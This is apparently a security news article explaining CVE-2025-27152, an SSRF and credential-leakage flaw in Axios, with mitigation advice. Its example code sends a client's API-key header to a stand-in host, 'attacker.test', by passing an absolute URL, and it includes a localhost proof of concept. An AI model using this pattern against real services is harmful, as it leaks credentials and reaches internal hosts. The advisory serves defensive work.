A critical security issue has been identified in the Axios package for JavaScript, which poses significant risks to millions of servers due to server-side request forgery (SSRF) and credential leakage.
This vulnerability occurs when absolute URLs are used in Axios requests, even when a base URL is specified.
CVE-2025-27152 Overview
The vulnerability associated with Axios is identified by the CVE ID CVE-2025-27152. It affects versions of Axios less than or equal to 1.7.9 and has been rated with a moderate severity level.
import axios from "axios";
const internalAPIClient = axios.create({
baseURL: "http://example.test/api/v1/users/",
headers: {
"X-API-KEY": "1234567890",
},
});
// Example of an absolute URL being passed
const userId = "http://attacker.test/";
// SSRF Vulnerability Exampleawait internalAPIClient.get(userId); // Sends request to http://attacker.test/ instead of the baseURL
In the code snippet above, even though a base URL is set for the Axios client, passing an absolute URL to the get() method leads to requests being sent directly to the specified absolute URL.
This bypasses the intended security mechanisms, as sensitive credentials such as the X-API-KEY are included in the request headers and can be leaked to unintended hosts.
Proof of Concept
To demonstrate this vulnerability, a simple proof of concept (PoC) can be set up using two local HTTP servers.
- Setup Servers:
mkdir /tmp/server1 /tmp/server2
echo "this is server1" > /tmp/server1/index.html
echo "this is server2" > /tmp/server2/index.html
python -m http.server -d /tmp/server1 10001 &
python -m http.server -d /tmp/server2 10002 &- Create a Test Script (main.js):
import axios from "axios";
const client = axios.create({ baseURL: "http://localhost:10001/" });
const response = await client.get("http://localhost:10002/");
console.log(response.data);- Run the Script:
node main.jsThe output will be “this is server2,” indicating that the request was successfully redirected to the unintended server.
Impact and Mitigation
The vulnerability poses two main risks:
- Credential Leakage: Sensitive API keys or credentials might be exposed to third-party hosts if an absolute URL is passed.
- SSRF (Server-Side Request Forgery): Attackers can leverage this exploit to make unauthorized requests to internal network hosts.
To mitigate this risk, users should update to Axios version 1.8.2 or later, where the issue has been fixed. Additionally, implementing strict validation for any user-provided URLs is crucial to prevent SSRF attacks.
The vulnerability was reported by @lambdasawa shared in Github, adding emphasis on the importance of community involvement in software security.
This recent security issue highlights the need for diligence in managing dependencies and validating inputs, especially with widely used libraries like Axios.
By updating to patched versions and enforcing robust security practices, developers can protect their applications and internal networks from SSRF and credential leakage threats.
Are you from SOC/DFIR Teams? – Analyse Malware Incidents & get live Access with ANY.RUN -> Start Now for Free.
